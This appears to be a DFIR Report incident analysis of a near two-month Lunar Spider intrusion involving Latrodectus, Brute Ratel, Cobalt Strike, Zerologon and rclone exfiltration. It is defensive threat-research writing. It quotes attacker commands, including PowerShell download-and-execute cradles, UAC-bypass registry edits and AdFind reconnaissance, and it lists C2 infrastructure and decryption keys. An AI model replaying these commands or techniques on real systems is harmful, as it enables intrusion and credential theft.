From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion By editor Published: 2025-09-29 · Archived: 2026-04-06 00:44:55 UTC This case was featured in our September 2025 DFIR Labs Forensics Challenge and is available as a lab today here for one time access or included in our new subscription plan. It was originally published as a Threat Brief to customers in Feb 2025 Case Summary The intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file has been previously reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated file, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among extensive filler content used for evasion. The JavaScript payload triggered the download of a MSI package, which deployed a Brute Ratel DLL file using rundll32. The Brute Ratel loader subsequently injected Latrodectus malware into the explorer.exe process, and established command and control communications with multiple CloudFlare-proxied domains. The Latrodectus payload was then observed retrieving a stealer module. Around one hour after initial access, the threat actor began reconnaissance activities using built-in Windows commands for host and domain enumeration, including ipconfig, systeminfo, nltest, and whoami commands. Approximately six hours after initial access, the threat actor established a BackConnect session, and initiated VNC-based remote access capabilities. This allowed them to browse the file system and upload additional malware to the beachhead host. On day three, the threat actor discovered and accessed an unattend.xml Windows Answer file containing plaintext domain administrator credentials left over from an automated deployment process. This provided the threat actor with immediate high-privilege access to the domain environment. On day four, the threat actor expanded their activity by deploying Cobalt Strike beacons. They escalated privileges using Windows’ Secondary Logon service and the runas command to authenticate as the domain admin account found the prior day. The threat actor then conducted extensive Active Directory reconnaissance using AdFind. Around an hour after this discovery activity they began lateral movement. They used PsExec to remotely deploy Cobalt Strike DLL beacons to several remote hosts including a domain controller as well as file and backup servers. They then paused for around five hours. On their return, they deployed a custom .NET backdoor that created a scheduled task for persistence and setup an additional command and control channel. They also dropped another Cobalt Strike beacon that had a new command and control server. They then used a custom tool that used the Zerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement to a second domain controller. After that they then tried to execute Metasploit laterally to that domain contoller via a remote service. However they were unable to establish a command and control channel from this action. On day five, the threat actor returned using RDP to access a new server that they then dropped the newest Cobalt Strike beacon on. This was then followed by an RDP logon to a file share server where they also deployed Cobalt https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 1 of 48 Strike. Around 12 hours after that they returned to the beachhead host and replaced the BruteRatel file used for persistence with a new BruteRatel badger DLL. After this there was a large gap before their next actions. Fifteen days later, the 20th since initial access, the threat actor became active again. They deployed a set of scripts to execute a renamed rclone binary to exfiltrate the data from the file share server. This exfiltration used FTP to send data over a roughly 10 hour period to the threat actor’s remote host. After this concluded there was another pause in threat actor actions. On the 26th day of the intrusion the threat actor returned to the backup server and used a PowerShell script to dump credentials from the backup server software. Two days later on the backup server they appeared again and dropped a network scanning tool, rustscan, which they used to scan subnets across the environment. After this hands on activity ceased again. The threat actor maintained intermittent command and control access for nearly two months following initial compromise, leveraging BackConnect VNC capabilities and multiple payloads, including Latrodectus, Brute Ratel, and Cobalt Strike, before being evicted from the environment. Despite the extended dwell time and comprehensive access to critical infrastructure, no ransomware deployment was observed during this intrusion. If you would like to get an email when we publish a new report, please subscribe here. Analysts Analysis and reporting completed by @RussianPanda9xx, Christos Fotopoulos, Salem Salem, reviewed by @svch0st. Initial Access The infection began with the execution of a Latrodectus JavaScript file, Form_W-9_Ver-i40_53b043910- 86g91352u7972-6495q3.js, first reported on X by @Cryptolaemus1 in the following post: The malware was first uploaded to VirusTotal on May 9, 2024, prior to Operation Endgame. This operation occurred between May 27 and 29, 2024, during which law enforcement dismantled multiple botnets, including Latrodectus. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 2 of 48 After the take down of the botnet, Latrodectus reappeared in June 2024, using tax-themed phishing campaigns as its initial access mechanism that dropped Latrodectus version 1.3 along with Brute Ratel, according to this article by Trustwave. Although our sample was from May and its file name was related to a W-9 tax form, it was version 1.3 of the malware and additionally it utilized Brute Ratel. Based on that, we believe it to be an early version of the campaign that was used later in June.  This report from Rapid7, also from June 2024, shows a malicious ad as the initial access used to lure a victim to download the malicious Javascript file. Given the similarity of that report and our initial malware behavior we assess that this we likely the same method used for our case as well. The heavily obfuscated JS file contained multiple lines starting with //, which included filler text. After further analyzing the file, a deobfuscation workflow was identified, executing all the lines of code starting with ////. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 3 of 48 Stage 1 Stage 2 https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 4 of 48 Deobfuscating the Latrodectus malware, uncovered that it performed an HTTP request to the URL hxxp://91.194.11[.]64/MSI.msi to install the next stage, thus triggering the Suricata rule from Emerging Threats ET POLICY Observed MSI Download. Execution Static analysis of the MSI package revealed that upfilles.dll was embedded within the compressed disk1.cab archive. The MSI installer utilized a custom action to execute the DLL via the legitimate Windows binary rundll32.exe, specifically invoking the exported function stow to initiate malicious execution. Brute Ratel https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 5 of 48 On day one, the loader upfilles.dll began execution on the beachhead host by resolving three APIs (VirtualAlloc, LoadLibraryA, GetProcessAddress) via the following hashing algorithm: for char in api_name: char_byte = ord(char) # Converts to lowercase, adds current hash temp = (char_byte | 0x60) + hash_value # Double for position-dependent hash hash_value = 2 * temp return hash_value Hashing algorithm Then it decrypted the intermediary Brute Ratel payload via an XOR decryption algorithm using the embedded key: 21 79 3C 7A 39 5F 3E 24 54 4A 7A 35 6C 33 3E 32 5F 66 74 76 6D 59 3C 4D 00 https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 6 of 48 The encrypted intermediary BRC4 payload The shellcode above then decrypted the BRC4 badger via the RC4 key 71 24 70 2C 7D 70 61 3F. Below are the decrypted Brute Ratel C4 (BRC4) C2s and RC4 key to decrypt the gathered information on the infected system that is sent to the C2. Decrypted BRC4 C2s and the RC4 key The subsequent YARA rule triggered during a scan of the process memory for Brute Ratel: On day five, the threat actor deployed a new Brute Ratel DLL through the established BackConnect session: rundll32 wscadminui.dll, wsca https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 7 of 48 The wscadminui.dll file serves as the Brute Ratel badger payload, maintaining the same obfuscation patterns established by the upfilles.dll loader. Decryption of the intermediary BRC4 payload is achieved through XOR operations using the embedded key sequence 75 36 58 33 64 4F 61 3F 4B 59 23 42 77 42 6F 41 39 6D 6E 4E 5E 46 56 47 66 41 00. Latrodectus After executing, Brute Ratel deployed Latrodectus malware through process injection into explorer.exe leveraging CreateRemoteThread API. Latrodectus, a downloader first identified by Proofpoint researchers in November 2023, is attributed to the same threat actors responsible for developing IcedID. Latrodectus being injected into explorer.exe Approximately six hours later, the process running Latrodectus established a connection to 193.168.143[.]196 on the beachhead host, which we suspect to have been a BackConnect C2 server. BackConnect is a post-compromise module that was initially deployed by IcedID, allowing threat actors to leverage infected systems for remote access through VNC modules. Multiple security researchers, such as Elastic Security Labs, hypothesize that Latrodectus is a potential successor to IcedID, due to code reuse and behavioral similarities, including the use of the same commands in the Discover flag. An hour after this traffic started, the following command was executed to switch to UTF-8 encoding: cmd.exe /K chcp 65001 && c: && cd c:\ This command was previously observed in Keyhole, a multi-functional VNC/BackConnect component used by IcedID, and prior cases involving IcedID infection. A few minutes later, Latrodectus spawned DLLHost.exe to likely inject the BackConnect payload with PROCESS_ALL_ACCESS (0x1fffff) access rights. The granted access rights provide full control over the target process, enabling memory manipulation, thread creation, and DLL injection capabilities. lsassa.exe Backdoor https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 8 of 48 On day four, the threat actor deployed and executed a binary named lsassa.exe via BackConnect on the beachhead host. Threat actor dropping lsassa.exe via BackConnect session The lsassa.exe file was a .NET backdoor that contained an encrypted payload embedded in an assembly resource file named lsassa&&. Inside this resource, a small header was present declaring which protections were used (encryption and/or compression). If encryption is used, it either uses a key embedded in the file or derives one from the assembly’s public key token, then decrypts the payload. If compression is enabled, the code decompresses the decrypted data before loading it. The backdoor implemented a persistent command and control system that establishes covert communication between an infected machine and a remote threat actor controlled server while creating a scheduled task for persistence. Upon initialization, the backdoor establishes a timer-based polling mechanism that triggers every 250 seconds to maintain regular contact with the C2 infrastructure and uses extracted obfuscated strings to construct the command. In our case, the threat actor leveraged the backdoor to create a scheduled task on the beachhead host with the command: "cmd.exe" /c schtasks /create /tn "SchedulerLsass" /tr "%ALLUSERSPROFILE%\USOShared\lsassa.exe" /sc ons During each communication cycle, the backdoor collects basic system reconnaissance data, including the username and machine name of the infected host, then transmits it to a remote server endpoint. The server C2 (hxxps://cloudmeri.com/comm[.]php) was obfuscated and embedded within the resource file name lsassa$ from the decrypted resource file lsassa&&. After successfully transmitting the victim data, the backdoor waits for a server response containing executable commands. When commands are received from the remote server, the backdoor validates that the response content is not empty and executes the payload through the Windows command interpreter. The execution occurs by spawning a new cmd.exe process with the UseShellExecute flag disabled and CreateNoWindow enabled to maintain stealth, while redirecting standard output and error streams to capture results. The backdoor includes a special termination command that allows the remote operator to exit the backdoor by calling Environment.Exit when a specific response string is received. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 9 of 48 Snippet of code showing the backdoor’s command and control communication function that collects system information and transmits it to a remote server while awaiting executable commands The backdoor conceals its strings in an encrypted resource and only reveals them at runtime. The extraction function first reads a length value to determine how many bytes to pull, then converts those bytes into readable text using Unicode encoding. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 10 of 48 String extraction function that uses variable-length encoding to decode obfuscated strings from the decrypted resource data array Cobalt Strike Several Cobalt Strike beacons were utilized over the course of the intrusion. The first was observed on day four, where the cron801.dl_ file was dropped on the beachhead host under C:\ProgramData from the injected explorer.exe process containing Latrodectus and was then executed twice by leveraging BackConnect. rundll32 cron801.dl_,lvQkzdrFdILT https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 11 of 48 BackConnect launching Cobalt Strike payload (pcap) The outbound connection was established with the Cobalt Strike server at hxxp://45.129.199[.]214/vodeo/wg01ck01. Shortly after, the Cobalt Strike beacon spawned from rundll32.exe was injected into sihost.exe process. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 12 of 48 Analysis of network traffic revealed a JSON response containing minified Vuetify v3.0.3 JavaScript served by the Cobalt Strike C2 server. This discovery led to the identification of additional potentially related C2 servers using Virustotal searches for similar characteristics (JSON response content or the URL path /vodeo/): hxxp[://]94[.]232[.]40[.]49/vodeo/wg01ck01 hxxps[://]techbulldigital[.]com/Apply/readme/VJICARU60DC?_WHBEXNIA=HNMIIIANEMPMLIDFEOPKLBDOEMPI hxxp[://]techbulldigital[.]com/List/com2/9O29EO3IRSBB hxxp[://]filomeruginfor[.]com/christian/house/cwk01 hxxp[://]filomeruginfor[.]com/deolefor/wg01ck01m hxxps[://]wehelpgood[.]xyz/Complete/v9[.]56/KT84GVGD135E hxxps[://]wehelpgood[.]xyz/derive/n/nzoqjd9mme hxxp[://]94[.]232[.]249[.]186/vodeo/vid_wg01ck01 hxxp[://]94[.]232[.]249[.]186/vodeo/wg01ck01 JSON response from Cobalt Strike C2 Later the cron801.dl_ file was renamed system.dl_ and deployed to several hosts, this is covered further in the Lateral Movement section Later on the same day, after the execution of the lsassa.exe backdoor, the threat actor dropped sys.dll. This was another Cobalt Strike stager containing shellcode that exhibits similarities to the payload documented in this report, via the BackConnect session on the beachhead host. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 13 of 48 The threat actor executed it via BackConnect with the command: rundll32 %ALLUSERSPROFILE%\sys.dll,StartUp471 The Cobalt Strike implant initiated outbound communication to 206.206.123[.]209:443 (avtechupdate[.]com) before injecting itself into the sihost.exe process. After the attempted UAC bypass, the Cobalt Strike stager was executed in memory with the C2 pointing to resources.avtechupdate[.]com/samlss/vm.ico. Snippet of Cobalt Strike stager https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 14 of 48 Speakeasy output from the extracted Cobalt Strike stager shellcode Shortly after, the sihost.exe process (containing an injected Cobalt Strike beacon) used RUNAS execution to create a new process (“gpupdate.exe”) running as the “Domain Admin” account, as described in the Privilege Escalation section. Subsequently, the compromised sihost.exe process, containing an injected Cobalt Strike beacon, leveraged the RUNAS command to spawn a new gpupdate.exe process under the domain admin account. sihost.exe spawning gpupdate.exe as “Domain Admin” user account The gpupdate.exe process then injected a Cobalt Strike beacon into the spoolsv.exe process space. Both spoolsv.exe and gpupdate.exe processes were observed creating named pipes consistent with Cobalt Strike communication patterns. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 15 of 48 Cobalt Strike named pipes The following day the sys.dll Cobalt Strike beacon was executed on two additional servers after connections to those hosts were made via RDP. Persistence Registry Run Key Persistence was first established after initial access on day one via a Registry Run key. This was achieved via the rundll32.exe process that created a Run key, with an innocuous name of Update, which would execute the Brute Ratel badger, upfilles.dll, if the system was restarted. The Run key was updated multiple times during the intrusion to point to wscadminui.dll in place of upfilles.dll. We could not determine why the actor re-applied the same change on several occasions. Scheduled Tasks In addition to the Run key the threat actor created a scheduled task on the fourth day of the intrusion on the beachhead host. The scheduled task was created by lsassa.exe which has been explained in further detail in the Execution section. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 16 of 48 Privilege Escalation Runas The threat actor activated Windows’ Secondary Logon service to enable the runas command – a built-in Windows feature that allows running programs under different user credentials. By calling this service, they were able to authenticate as the domain admin account found in the unattend.xml file and escalate their privileges from a regular user to full administrative control over the network Starting the Secondary Logon service The Windows authentication log shows successful privilege escalation from a low-privileged user to a domain administrator account with elevated token permissions. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 17 of 48 Windows security log showing privilege escalation from a low-privileged user to a domain admin UAC Bypass The Cobalt Strike sys.dll implant executed on the beachhead host initiated a UAC bypass using the elevate uac-token-duplication technique, a well-documented registry hijacking method first observed in 2017. This technique exploits the UAC token duplication vulnerability, allowing the Cobalt Strike implant to execute arbitrary code with privileges stolen from elevated processes, successfully achieving privilege escalation without user interaction. Initial registry modifications hijacked the ms-settings protocol handler to redirect Windows Settings calls to malicious PowerShell commands: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hid reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /f /d "cmd.exe /c pow Privilege escalation occurred through execution of ComputerDefaults.exe, a trusted Windows binary that queries the hijacked ms-settings protocol with elevated privileges. With the elevated token duplicated from ComputerDefaults.exe, multiple PowerShell instances were executed to establish communication with the Cobalt Strike listener, indicating token rights restrictions requiring different execution approaches: https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 18 of 48 "cmd.exe" /c powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0. powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/' "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Defense Evasion Process Injection The most common evasion technique that the threat actor utilized was process injection. During its execution, the Brute Ratel loader upfilles.dll launched the final stage of the Latrodectus malware inside the explorer’s memory. From the fourth day onward, the threat actor expanded their tooling and heavily utilized both Brute Ratel and Cobalt Strike for process injection. Using the Sysmon eventID 8, CreateRemoteThread, multiple instances of process injection were identified for both long-term and short-term sacrificial processes. After further investigating the process memory, YARA rules confirmed also the injection of Cobalt Strike beacons into multiple legitimate processes, such as spoolsv.exe. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 19 of 48 File Deletion Τhe threat actor also deleted files after using them, to cover their tracks and make the investigation more challenging. Specifically, they deleted more than half of the files and tools that had been downloaded on the compromised hosts. Credential Access Latrodectus Stealer Module https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 20 of 48 Using command ID 21, the Latrodectus-injected explorer.exe process downloaded the stealer module file fxrm_vn_9.557302425.bin from the C2 server. Analysis revealed that the stealer lacks functionality to decrypt cookies from current Chrome versions, suggesting the threat actor may not have updated their stealer module to accommodate recent browser security enhancements. The stealer had the hardcoded time of when the stealer module was built – 00:39:18 Mar 29 2024. Similar to the Latrodectus loader component, the stealer module dynamically resolved Windows APIs by iterating through the Process Environment Block (PEB) InLoadOrderModuleList, computing CRC32 hashes for each loaded module name, and comparing results against target hash values. The stealer was capable of harvesting credentials from 29+ Chromium-based browsers, including Google Chrome, Microsoft Edge, Yandex Browser, Vivaldi, Comodo Dragon, Orbitum, Epic Privacy Browser, and other variants. Firefox receives separate handling through profile enumeration targeting cookies.sqlite database files. During its execution, it extracted email credentials from Microsoft Outlook configurations across Office versions 11.0-17.0 by querying Windows registry keys. The stealer is also capable of harvesting server configurations including SMTP, POP3, IMAP, and NNTP server addresses, port numbers, usernames, and encrypted passwords. Additionally, it targeted the registry path HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles to extract legacy email configurations from older Windows Mail, Outlook Express, and MAPI profiles that may contain additional cached credentials. Internet Explorer credentials were obtained through COM interface manipulation, accessing the IntelliForms Storage2 system. The collected data is organized into distinct sections with the below headers: cr_pass for Chrome passwords ff_pass for Firefox data ie_pass for Internet Explorer credentials edge_pass for Edge data outlook_pass for email configurations _cookie variants for session data. Each section contains structured entries with pipe-delimited fields. The complete dataset undergoes base64-encoding. The stealer then creates a shared memory region named 12345 and stores a pointer to the encoded data, which could allow other processes to access the collected information. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 21 of 48 Snippet of data collection code showing Firefox, IE, Edge, and Outlook extraction functions. Answer File Access Backconnect was used by the threat actor early in the campaign (day three) to list directories on the beachhead. After listing files in directories, the threat actor focused their attention on the file unattend.xml, an answer file. Answer files are used to control the configuration of Windows while setting it up from an image. One of the components of answer files is called Microsoft-Windows-UnattendedJoin which allows admins to easily domain join devices during setup, this is done by supplying plain text credentials (username and password) in the unattend.xml file. The threat actor collected the file via Backconnect (using the GET C:\Unattend.xml command) and was able to access the plain-text domain admin credentials stored in the file. LSASS Access The threat actor utilized their elevated user permissions to access the LSASS process on multiple devices in the environment. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 22 of 48 All instances of LSASS access followed the same pattern, the access was initiated by an injected process (either runonce.exe or gpupdate.exe) with a process requesting 0x1010 permissions and another instance of the same process requesting 0x1fffff seconds later. This cycle repeated three times in total during the intrusion, each time facilitated via a Cobalt Strike beacon process. Veeam-Get-Creds On day 26 of the intrusion, the threat actor ran the Veeam-Get-Creds.ps1 script from the injected spoolsv.exe process: powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQ which decoded to: IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:24003/'); Veeam-Get-Creds.ps1 This technique has been previously observed by ransomware groups such as Noberus and Vice Society. It typically indicates the threat actor is targeting backup systems for destruction or virtualization infrastructure for encryption (commonly protected by Veeam backup solutions). The Veeam-Get-Creds.ps1 script is publicly available on GitHub. Upon executing the script, the threat actor would have obtained any plaintext usernames and passwords stored in the Veeam Credential Manager. These credentials are typically used to authenticate to remote systems for backup operations. Although in this intrusion, this execution was one of the final actions taken by the threat actor. Discovery Approximately one hour after Latrodectus was injected into explorer.exe, it began executing the following discovery commands on the beachhead host. ipconfig /all systeminfo nltest /domain_trusts nltest /domain_trusts /all_trusts net view /all /domain net view /all net group "Domain Admins" /domain net config workstation wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | find whoami /groups Process activity related to discovery then went quiet until on day four, the injected Cobalt Strike beacon used systeminfo to query for system information. The threat actor then executed DISK command via BackConnect to https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 23 of 48 query disk information. DISK command execution via BackConnect session The Cobalt Strike injected processes then executed reconnaissance commands and leveraged AdFind for Active Directory enumeration activities: systeminfo nltest /dclist:domain.local net view REDACTED net user REDACTED /domain dir \\REDACTED\C$ net group "domain admins" /domain dsquery subnet nltest /domain_trusts nltest /dsgetdc:domain.local wmic /node:REDACTED logicaldisk list brief AdFind Active Directory Enumeration: adfind.exe -f "(objectcategory=person)" >> ad_users.txt adfind.exe -f "objectcategory=computer" >> ad_computers.txt%W adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt adfind.exe -subnets -f (objectCategory=subnet)> ad_subnets.txt adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt adfind.exe -f "&(objectCategory=computer)(operatingSystem=*server*)" -csv > ad_servers.csv Continued Discovery and Network Testing: net view REDACTED ping -n 1 REDACTED type "\\REDACTED\C$\REDACTED\REDACTED.bat" The threat actor then tried to move AdFind outputs, but appeared to struggle based on the commands observed: C:\PerfLogs\*.* %ALLUSERSPROFILE%\ move %ALLUSERSPROFILE%\ad_users.txt C:\REDACTED\ move C:\REDACTED\ad_users.txt %PUBLIC%\ While this was happening, they continued to issue more discovery commands and attempted to organize their AdFind output: https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 24 of 48 net view REDACTED wmic /node:REDACTED logicaldisk list brief %WINDIR%\system32\cmd.exe /C ping -n 1 REDACTED move %USERPROFILE%\ad_users.txt %USERPROFILE%\Pictures\ attrib %USERPROFILE%\Pictures\ad_users.txt The actor then expanded their reconnaissance to include DNS information while simultaneously troubleshooting file access issues on their collected data: dnscmd /zoneprint domain.local netdom query SERVER >> serv.log attrib -a -s -h -r /s %USERPROFILE%\Pictures\ad_users.txt attrib %USERPROFILE%\Pictures\ad_users.txt attrib %USERPROFILE%\Pictures\*.* attrib -a +s +h -r /s %USERPROFILE%\Pictures\ad_users.txt https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 25 of 48 Based on the BackConnect traffic capture, we observed that the threat actors did not have the proper access to the files. Minutes later, the compromised explorer.exe process spawned DllHost.exe, indicating resumption of the BackConnect VNC activity observed previously. The DllHost.exe process subsequently executed a Windows shell command to open the “This PC” interface on the beachhead host: cmd.exe /c start "" C:\Windows\explorer.exe shell:mycomputerfolder The session was then leveraged to attempt to view the AdFind results: "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\\Pictures\ad_users.txt" The threat actor continued to encounter file permission issues, preventing them from accessing their own data. They attempted to resolve this by first setting the local user as the file owner, then switching to the domain account as owner, and when both ownership changes failed to provide adequate access, they finally used the /reset command to restore default permissions: icacls C:\Users\\Pictures\ad_users.txt /setowner "" /T /C icacls C:\Users\\Pictures\ad_users.txt /setowner "\" /T /C icacls "C:\Users\\Pictures\ad_users.txt" /reset /T After running the Cobalt Strike beacons laterally on several hosts, the threat actor conducted remote user enumeration across domain systems using the following command from the beachhead host: quser The threat actor utilized the PowerView module Invoke-ShareFinder twice during the intrusion. IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:49157/'); Invoke-ShareFinder -CheckSh Approximately 45 minutes following the Metasploit shell deployment attempt on the second domain controller, the threat actor initiated an additional round of AdFind reconnaissance from the beachhead host: AdFind.exe -b dc=domain,dc=local -f (objectcategory=person) > adflogs\domain.local_ad_users.txt AdFind.exe -b dc=domain,dc=local -f (objectcategory=computer) > adflogs\domain.local_ad_computers.txt AdFind.exe -b dc=domain,dc=local -f (objectcategory=organizationalUnit) > adflogs\domain.local_ad_ous.txt AdFind.exe dc=domain,dc=local -subnets -f (objectcategory=subnet) > adflogs\domain.local_ad_subnets.txt AdFind.exe -b dc=domain,dc=local -f (objectcategory=group) > adflogs\domain.local_ad_group.txt Although the threat actor attempted to compress the collected data, forensic analysis did not identify any created zip archives on the system. "7z.exe" a -mx1 -r0 adflogs.zip adflogs https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 26 of 48 The threat actor returned 28 days after the initial access to run a final round of network scanning discovery. Operating from a backup server, the threat actor deployed the rustscan tool through the Cobalt Strike-injected spoolsv.exe process, first running rustscan with the help flag. The threat actor then began scanning various /16 and /8 network blocks for SMB services. rustscan.exe -a REDACTED/16 -p 445 --no-nmap rustscan.exe -a REDACTED/16 -p 445 rustscan.exe -a REDACTED/8 -p 445 "nmap -vvv -p 445 REDACTED" Lateral Movement WMI Remoting Although the threat actor ran discovery commands just under an hour from the initial access, the first lateral movement attempt came three days into the intrusion when the threat actor attempted to execute the system.dl_ Cobalt Strike beacon on a domain controller via WMIC remote execution. This execution was not successful as it was not observed on the domain controller. Remote Services After the failed lateral movement attempt via WMIC, the threat actor pivoted to PsExec. The initial PsExec command also failed since the threat actor forgot to include the accepteula flag. After fixing the forgotten EULA mistake, they were able to successfully execute system.dl_ on the domain controller via rundll32. The threat actor then proceeded to execute the same command on a file share server and backup server minutes after the domain controller execution. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 27 of 48 Six hours after this initial lateral movement activity, the threat actor deployed and executed the zero.exe payload from C:\ProgramData on the beachhead. This payload, delivered via BackConnect session, was a custom implementation of the Zerologon vulnerability (CVE-2020-1472) exploit with capabilities for credential harvesting and remote code execution. zero.exe delivered via BackConnect During the intrusion the threat actor used zero.exe to move laterally between devices in the network. The executable was executed on the beachhead host and targeted a second domain controller, overall it was executed eight different times with a different username being used every execution. The execution used remote services to run code on lateral hosts. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 28 of 48 After the completion of the zero.exe executions, the threat actor attempted to establish a Metasploit reverse shell connection via a remote service on the same domain controller, to the C2 server at 217.196.98[.]61:4444. Remote Service executing Metasploit shellcode Running Metasploit shellcode in speakeasy https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 29 of 48 RDP RDP was another Windows native tool used by the threat actor for lateral movment. The threat actor had extracted domain admin credentials as discussed in the Credential Access section, these credentials were used by the threat actor to login to two servers in the environment from the beachhead device via RDP, giving them interactive admin access to both devices. While the logins originated from the beachhead host the threat actor leaked their source hostname during the authentication process. VPS2DAY-32220LE https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 30 of 48 The threat actor’s hostname implies that the infrastructure used by them was provided via a German hosting company VPS2DAY, which seems to be operating under the name Servinga since the vps2day domain redirects to Servinga. Command and Control Latrodectus/Backconnect The malware used to gain the initial foothold in the host was a Latrodectus Javascript file. The aforementioned file has been associated with high confidence to the Russian threat actor LUNAR SPIDER by Eclecticiq. It is important to note that although the sample contained only two domains, the injected explorer.exe communicated with three additional C2 servers. After further investigating the explorer’s memory, the following HTTPS request was identified towards one of the new domains: https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 31 of 48 Upon decrypting the encrypted traffic sent by Latrodectus to the C2, the following information was identified: C2 Domain hxxps[://]grasmertal[.]com/live/ Campaign ID 2221766521 Latrodectus Version 1.3 RC4 Key xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8 One extra functionality observed from the Latrodectus malware was Command and Control communication using the Backconnect protocol. More specifically, connections from explorer.exe and dllhost.exe were performed toward two different IP addresses. Additionally, these IP’s have been categorized with moderate confidence related to IcedId Backconnect, which commonly shares infrastructure with Latrodectus. https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 32 of 48 Connections to the first IP started during the first day and then swapped to the second IP on the fifth day. As it was previously mentioned, utilizing Backconnect, various tasks were performed, such as browsing the file system, reading files, and uploading malware on the infected hosts. Backconnect traffic showing file upload Description Domain IP Address Port ORG Country Latrodectus C2 workspacin[.]cloud 104.21.16.155 or 172.67.213.171 443 CLOUDFLARENET US Latrodectus C2 illoskanawer[.]com 173.255.204.62 443 Akamai Connected Cloud US https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 33 of 48 Latrodectus C2 grasmetral[.]com 104.21.52.10 or 172.67.193.233 443 CLOUDFLARENET  US Latrodectus C2 jarkaairbo[.]com 172.67.172.177 or 104.21.30.90 443 CLOUDFLARENET  US Latrodectus C2 scupolasta[.]store 172.67.174.176 or 104.21.88.89 443 CLOUDFLARENET  US Latrodectus MSI Second Stage – 91.194.11.64 443 TANGRAM-CANADA-INC CA Backconnect – 193.168.143.196 443 Zergrush Srl RO Backconnect – 185.93.221.12 443 SHOCK-1 RO Brute Ratel The MSI file downloaded by the malicious Javascript contained a Brute Ratel DLL (upfilles.dll) that started C2 communication to a series of remote hosts. Of note is the use of the Tyk.io service which we have covered in prior reports. Domain IP Address Port ORG Country anikvan[.]com 95.164.68.73 443 Pq Hosting Plus S.r.l. DE altynbe[.]com 138.124.183.215 443 Pq Hosting Plus S.r.l. US boriz400[.]com 91.194.11.183 443 TANGRAM-CANADA-INC CA 